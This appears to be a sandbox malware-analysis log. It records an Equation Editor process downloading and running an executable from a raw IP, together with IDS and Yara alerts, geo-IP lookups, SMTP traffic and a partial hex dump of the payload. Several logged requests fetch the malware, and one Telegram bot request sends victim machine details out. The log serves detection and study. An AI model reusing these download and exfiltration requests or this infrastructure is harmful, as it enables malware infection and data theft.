Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 66.63.187.123:80 -> 192.168.2.22:49161
Source: Network traffic	Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 66.63.187.123:80 -> 192.168.2.22:49161

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_002ACB15 LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,

2_2_002ACB15

Source: global traffic

TCP traffic: 192.168.2.22:49180 -> 217.12.218.219:587

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Thu, 26 Sep 2024 07:19:21 GMTContent-Type: application/x-msdos-programContent-Length: 708096Connection: keep-aliveLast-Modified: Thu, 26 Sep 2024 03:39:16 GMTETag: "ace00-622fd7b9e4c97"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fa d6 f4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a8 0a 00 00 24 00 00 00 00 00 00 9e c6 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c c6 0a 00 4f 00 00 00 00 e0 0a 00 ac 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 a6 0a 00 00 20 00 00 00 a8 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac 20 00 00 00 e0 0a 00 00 22 00 00 00 aa 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 c6 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 59 00 00 5c 35 00 00 03 00 00 00 1e 00 00 06 2c 8f 00 00 20 37 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 7c 00 00 00 00 00 00 00 02 28 15 00 00 0a 00 00 02 03 16 9a 28 16 00 00 0a 7d 08 00 00 04 02 02 7b 08 00 00 04 28 02 00 00 06 7d 01 00 00 04 02 03 17 9a 28 17 00 00 0a 7d 02 00 00 04 02 03 18 9a 28 17 00 00 0a 7d 04 00 00 04 02 03 19 9a 28 17 00 00 0a 7d 05 00 00 04 02 03 1a 9a 28 17 00 00 0a 7d 03 00 00 04 02 03 1b 9a 28 18 00 00 0a 7d 06 00 00 04 02 03 1c 9a 28 17 00 00 0a 7d 07 00 00 04 2a 13 30 02 00 21 00 00 00 01 00 00 11 00 0f 00 28 19 00 00 0a 20 6c 07 00 00 59 20 6d 01 00 00 5a 0f 00 28 1a 00 00 0a 58 0a 2b 00 06 2a 00 00 00 13 30 05 00 6d 01 00 00 02 00 00 11 02 73 1b 00 00 0a 7d 09 00 00 04 02 20 80 96 98 00 7d 0a 00 00 04 02 23 00 00 00 00 d0 12 63 41 7d 0b 00 00 04 02 20 80 69 67 ff 7d 0c 00 00 04 02 23 00 00 00 00 d0 12 63 c1 7d 0d 00 00 04 02 20 0f 27 00 00 17 17 73 1c 00 00 0a 7d 0e 00 00 04 02 17 17 17 73 1c 00 00 0a 7d 0f 00 00 04 02 16 7d 10 00 00 04 02 16 7d 11 00 00 04 02 28 15 00 00 0a 00 00 03 28 1d 00

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%209/26/2024%20/%206:20:30%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: ITLDC-NLUA ITLDC-NLUA

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49162 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49165 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49170 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49164 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49166 -> 188.114.96.3:443

Source: global traffic

TCP traffic: 192.168.2.22:49180 -> 217.12.218.219:587

Source: global traffic	HTTP traffic detected: GET /txt/XcsQpLjhNNvxYtrw.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.123
